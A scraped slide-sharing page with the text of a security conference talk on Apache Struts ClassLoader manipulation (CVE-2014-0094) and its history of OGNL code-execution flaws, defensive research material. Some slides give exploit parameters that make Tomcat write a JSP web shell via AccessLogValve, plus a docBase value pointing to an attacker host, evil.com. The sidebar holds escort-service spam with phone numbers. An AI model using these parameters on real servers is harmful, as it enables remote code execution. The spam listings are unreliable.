ApacheCon Europe 2012 -Big Search 4 Big DataApacheCon Europe 2012 -Big Search 4 Big Data
ApacheCon Europe 2012 -Big Search 4 Big DataOpenSource Connections
 
Solr Troubleshooting - TreeMap approach
Solr Troubleshooting - TreeMap approachSolr Troubleshooting - TreeMap approach
Solr Troubleshooting - TreeMap approachAlexandre Rafalovitch
 
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...Lucidworks
 
Code transformation With Spoon
Code transformation With SpoonCode transformation With Spoon
Code transformation With SpoonGérard Paligot
 
Practical Chaos Engineering
Practical Chaos EngineeringPractical Chaos Engineering
Practical Chaos EngineeringSIGHUP
 
The Diabolical Developer's Guide to Surviving Java 9
The Diabolical Developer's Guide to Surviving Java 9The Diabolical Developer's Guide to Surviving Java 9
The Diabolical Developer's Guide to Surviving Java 9jClarity
 
Arquillian in a nutshell
Arquillian in a nutshellArquillian in a nutshell
Arquillian in a nutshellBrockhaus Group
 
Apache ZooKeeper TechTuesday
Apache ZooKeeper TechTuesdayApache ZooKeeper TechTuesday
Apache ZooKeeper TechTuesdayAndrei Savu
 
PROGRAMMING IN JAVA-unit 3-part II
PROGRAMMING IN JAVA-unit 3-part IIPROGRAMMING IN JAVA-unit 3-part II
PROGRAMMING IN JAVA-unit 3-part IISivaSankari36
 
Mule memory leak issue
Mule memory leak issueMule memory leak issue
Mule memory leak issueJeeHyunLim
 
SFBay Area Solr Meetup - June 18th: Benchmarking Solr Performance
SFBay Area Solr Meetup - June 18th: Benchmarking Solr PerformanceSFBay Area Solr Meetup - June 18th: Benchmarking Solr Performance
SFBay Area Solr Meetup - June 18th: Benchmarking Solr PerformanceLucidworks (Archived)
 
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...Paul King
 
Orchestrate Your Choreography
Orchestrate Your ChoreographyOrchestrate Your Choreography
Orchestrate Your ChoreographyDaniel Pokusa
 
Back to the future with Java 7 (Geekout June/2011)
Back to the future with Java 7 (Geekout June/2011)Back to the future with Java 7 (Geekout June/2011)
Back to the future with Java 7 (Geekout June/2011)Martijn Verburg
 
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...Databricks
 

Similaire à Deep Dive into the Java Framework Apache Struts (20)

#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"
#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"
#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"
 
Big Search with Big Data Principles
Big Search with Big Data PrinciplesBig Search with Big Data Principles
Big Search with Big Data Principles
 
ApacheCon Europe 2012 -Big Search 4 Big Data
ApacheCon Europe 2012 -Big Search 4 Big DataApacheCon Europe 2012 -Big Search 4 Big Data
ApacheCon Europe 2012 -Big Search 4 Big Data
 
Solr Troubleshooting - TreeMap approach
Solr Troubleshooting - TreeMap approachSolr Troubleshooting - TreeMap approach
Solr Troubleshooting - TreeMap approach
 
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
Solr Troubleshooting - Treemap Approach: Presented by Alexandre Rafolovitch, ...
 
Code transformation With Spoon
Code transformation With SpoonCode transformation With Spoon
Code transformation With Spoon
 
Practical Chaos Engineering
Practical Chaos EngineeringPractical Chaos Engineering
Practical Chaos Engineering
 
The Diabolical Developer's Guide to Surviving Java 9
The Diabolical Developer's Guide to Surviving Java 9The Diabolical Developer's Guide to Surviving Java 9
The Diabolical Developer's Guide to Surviving Java 9
 
Arquillian in a nutshell
Arquillian in a nutshellArquillian in a nutshell
Arquillian in a nutshell
 
55j7
55j755j7
55j7
 
Apache ZooKeeper TechTuesday
Apache ZooKeeper TechTuesdayApache ZooKeeper TechTuesday
Apache ZooKeeper TechTuesday
 
Arquillian in a nutshell
Arquillian in a nutshellArquillian in a nutshell
Arquillian in a nutshell
 
PROGRAMMING IN JAVA-unit 3-part II
PROGRAMMING IN JAVA-unit 3-part IIPROGRAMMING IN JAVA-unit 3-part II
PROGRAMMING IN JAVA-unit 3-part II
 
Mule memory leak issue
Mule memory leak issueMule memory leak issue
Mule memory leak issue
 
Struts2.x
Struts2.xStruts2.x
Struts2.x
 
SFBay Area Solr Meetup - June 18th: Benchmarking Solr Performance
SFBay Area Solr Meetup - June 18th: Benchmarking Solr PerformanceSFBay Area Solr Meetup - June 18th: Benchmarking Solr Performance
SFBay Area Solr Meetup - June 18th: Benchmarking Solr Performance
 
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
 
Orchestrate Your Choreography
Orchestrate Your ChoreographyOrchestrate Your Choreography
Orchestrate Your Choreography
 
Back to the future with Java 7 (Geekout June/2011)
Back to the future with Java 7 (Geekout June/2011)Back to the future with Java 7 (Geekout June/2011)
Back to the future with Java 7 (Geekout June/2011)
 
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
HIPAA Compliant Deployment of Apache Spark on AWS for Healthcare Nitin Panjwa...
 

Dernier

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 

Dernier (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 

Deep Dive into the Java Framework Apache Struts

  • 1. Deep  inside  the  Java   framework     Apache  Struts       Julián  Vilas  
  • 2. Whoami   •  Julián  Vilas  (Redsadic)   – @julianvilas   •  Security  Analyst  &  Researcher    
  • 3. ¿Apache  Struts?   Java  framework   – for  Java  webapps   – Two  major  versions   • Struts  1.x  (EoL  since  2013)   • Struts  2.x  
  • 4. Why  Struts?   •  (Mar  2014)  CVE-­‐2014-­‐0094  goes  public   •  What  the  hell  was  it?   – Struts  2  vulnerability   – UnauthenVcated   – All  versions  affected   – Could  lead  to  RCE  
  • 5. CVE-­‐2014-­‐0094   “ParametersInterceptor  allows  access  to  'class'   parameter  which  is  directly  mapped  to  getClass()   method  and  allows  ClassLoader  manipulaVon”     •  Credits:   –  Peter  Magnusson   –  Przemysław  Celej   •  A^er  reading  it…   –  Let’s  go  learning  some  basics  
  • 6. OGNL   Object  Graph  NavigaVon  Language     •  Expression  Language  for  gedng  and  sedng   properVes  of  Java  objects   – Objects  that  are  stored  in  the  Context    
  • 7. top   OGNL   #foo.dummy     //  foo.getDummy()     #bar.dummy   //  bar.getDummy()     dummy   //  qux.getDummy()     dummy  =  “RootedCON”   //  qux.setDummy(“RootedCON”)   foo   bar   baz   qux   Context   root   foo   bar   qux   ….   Struts2  OGNL  Context   (AcDonContext)   ValueStack  
  • 8. Struts  2  request  processing       1 7 Filter     Dispatcher   Interceptors   AcVon   Result   /example/hello.acDon   HTML   1 7 User   2 3 4 56 hMp://struts.example.com/example/hello.acDon   HTML   ParametersInterceptor   Struts2  app  
  • 9. ParametersInterceptor   “This  interceptor  gets  all  parameters  from   AcVonContext.getParameters()  and  sets  them  on   the  value  stack  by  calling   ValueStack.setValue(String,  Object)”   “Because  parameter  names  are  effecDvely  OGNL   statements,  it  is  important  that  security  be  taken   into  account”   hpp://struts.apache.org/release/2.0.x/struts2-­‐core/apidocs/com/opensymphony/xwork2/interceptor/ ParametersInterceptor.html    
  • 10. ParametersInterceptor  example   …   HelloWorldAcVon   …   AcDonContext   ValueStack   PUSH   LOOKUP   SETTER   SET  
  • 12. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   ?   AcDonSupport   EXTENDS  
  • 14. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS  
  • 16. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS   …   getClass()   …   Object   EXTENDS  
  • 17. NavigaVng  objects             •  Parameters  are  evaluated  iteraVvely  as  an  AST   chain,  composed  by   – A  chain  of  gepers  (without  parameters)   – Ending  with  a  seper  (1  String,  boolean  or  int   parameter)    
  • 18. Looking  for  sepers   •  Through  object  navigaVon  reach  several  seper   methods  not  part  of  the  AcVon  can  be  reached   –  What  methods?   •  Post  published  by  neobyte       hpp://sec.baidu.com/index.php?research/detail/id/18     1.  PoC  for  gedng  reachable  sepers   2.  A  method  for  gedng  RCE  on  Tomcat  8    
  • 19. DEMO   Struts  Tester  on   Tomcat  6  /  7  &  Tomcat  8     customized  &  commented  version  ready  to  use   hpps://github.com/julianvilas/rooted2k15  
  • 20. Exploitability   Tested  against:     •  Tomcat  6  /  7  à  RCE  via  “docBase”  (win  only)   •  Tomcat  8  à  RCE  via  “AccessLogValve”   •  Glassfish  4  à  RCE  via  “docBase”  (win  only)   •  Websphere  8.5  (developer)  à  RCE  not  found   •  Weblogic  10  &  12  à  RCE  not  found   •  JBOSS  7.1  &  7.4  à  RCE  not  found  
  • 21. What  about  Struts  1   •  According  to  CVE-­‐2014-­‐0114,  Struts  1  is  also  vulnerable   •  Unpatched!  (struts  1  is  over  EoL,  but  is  sVll  in  use)     •  Different  reason:  Struts  1  no  OGNL  nor  Value  Stack   –  The  key:  bean  populaVon  with  BeanUVls       •  You  can  find  some  Alvaro  Muñoz  (@pwntester)  gold,  like   further  explanaVon  and  a  filter  to  be  applied  as  a   workaround,  at   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Protect-­‐your-­‐ Struts1-­‐applicaVons/ba-­‐p/6463188#.VBMB0i5_s0z   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Update-­‐your-­‐ Struts-­‐1-­‐ClassLoader-­‐manipulaVon-­‐filters/ba-­‐p/6639204#.VOsFG7CG_8Q  
  • 22. AccessLogValve  exploitaVon             A  log  file  with  name  shell1.jsp  is  created  at  webapps/ROOT.   When  requesVng  a  inexistent  URL,  it’s  logged  into  the  log  file   (that  it’s  going  to  be  interpreted  as  a  JSP  when  get  accessed).   .directory=webapps/ROOT     .prefix=shell   .suffix=.jsp   .fileDateFormat=1   1 2 3 4
  • 23. DEMO     AccessLogValve  exploitaVon     hpps://github.com/rapid7/metasploit-­‐framework/blob/master/modules/exploits/ mulV/hpp/struts_code_exec_classloader.rb  
  • 24. docBase  exploitaVon   •  “The  Document  Base  (also  known  as  the  Context   Root)  directory  for  this  web  applicaVon,  or  the   pathname  to  the  web  applicaDon  archive  file  (if  this   web  applicaVon  is  being  executed  directly  from  the   WAR  file).”   •  Legit  applicaVon  goes  down   .docBase=//evil.com/shared    
  • 25. About  metasploit  module   •  Tomcat  6/7  &  GlassFish  (docBase)     – Only  Win     – Not  landed  yet  in  trunk  but  works  fine   – Maphew  Hall  (0x41414141)  pull  requests:   hpps://github.com/rapid7/metasploit-­‐framework/pull/3074   hpps://github.com/rapid7/metasploit-­‐framework/pull/3075   hpps://github.com/rapid7/metasploit-­‐framework/pull/3323     – Same  module  than  before,  landed  yesterday  night  
  • 27. I  know  Kung-­‐fu                     •  Now  what?  
  • 28. Searching  Struts  sites   •  Dumb  detecVon  of  Struts  2  sites   – Default  extension  for  Struts  2:  “.acVon”   •  Also,  when  default  configured,  it  accepts  both  “.acVon”   and  no  extension      
  • 31. Searching  Struts  sites   •  Dumb  detecVon  of  Struts  1  sites     – Default  extension  for  Struts  1:  “.do”    
  • 32. Searching  Struts  sites   hpps://web.archive.org/web/20060519001958/hpp://simonpeter.com/technology/ java/struts/sites.html  
  • 33. Vulnerability  checking   •  To  check  if  a  Struts  2  site  is  vulnerable,  modify   “cacheMaxSize”  property   –  Integer.MAX_VALUE  ==  2147483647  (in  x86)             •  Tomcat  6/7  &  Glassfish   •  Tomcat  8       2147483647   2147483648   AAAAAAAAA  
  • 34. Vulnerability  checking   •  In  Struts  1  if  the  conversion  String  to  Integer   fails  a  default  value  0  is  set   •  But  when  trying  to  set  a  method  that  receives   an  Object  with  a  String,  a  excepVon  is  raised       ROOTEDCON  
  • 35. OK  I  see,  but…        
  • 36. Previous  security  bulleVns         RCE,  when  form  validaDon  fails  field  values   are  interpreted  as  OGNL     RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL   RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL  !  S2-­‐003  fix  was  incomplete   RCE,  user’s  input  is  evaluated  as  OGNL  when   there’s  a  conversion  error   Several  RCE:  via  ExcepDonDelegator  (same   as  S2-­‐007),  CookieInterceptor  (same  idea   than  S2-­‐003  and  S2-­‐005),  etc.   RCE,  incomplete  fix  for  S2-­‐003  and  S2-­‐005  on   ParametersInterceptor    
  • 37. Previous  security  bulleVns         RCE,  incomplete  fix  for  S2-­‐003,  S2-­‐005  and   S2-­‐009  on  ParametersInterceptor  when   using  values  for  redirecDons   RCE,  s:url  and  s:a  tags,  when   "includeParams"  is  set,  allow  evaluaDng  the   values  of  request  parameters  as  OGNL.   RCE,  same  than  S2-­‐013,  incomplete  fix.   RCE,  acDons  using  wildcards  and  Double   OGNL  evaluaDon  allow  OGNL  injecDon   RCE:  DefaultAcDonMapper  short-­‐circuit   navigaDon  interpreted  as  OGNL   RCE,  what  we  saw  in  this  presentaDon  ☺   (ParametersInterceptor)     RCE,  Incomplete  fix  for  S2-­‐020   Incomplete  fix  for  S2-­‐020  and  S2-­‐021  
  • 39. Conclusions?   •  Seven  years  from  between  S2-­‐001  and  S2-­‐020   •  Same  kind  of  vulnerabiliVes:  injecDng  OGNL   from  user-­‐supplied  data     •  Several  bypasses  for  fixes   •  Almost  all  RCE       •  Take  your  own…  
  • 40. Bonus  track  -­‐  Confluence   •  Is  based  on  a  WebWork  fork  (previous  than  Struts  2)   •  If  you  look  their  bulleVns   –  Versions  up  to  and  including  5.5.1  vulnerable  to   ClassLoader  manipulaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory +2014-­‐05-­‐21     –  Versions  up  to  5.6  (before  5.6.6  and  5.5.7)  are  vulnerable   to  double  OGNL  evaluaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-­‐ +2015-­‐01-­‐21   •  Don’t  they  look  familiar?  J  
  • 41. Bonus  track  -­‐  Confluence  
  • 42. QuesVons?   •  You  can  ask  also  :   – Poke  me  around   – by  twiper:  @julianvilas        
  • 43. QuesVons?   •  And  what  do  you  think  about  OGNL?     Thanks  for  aMending!!!  ☺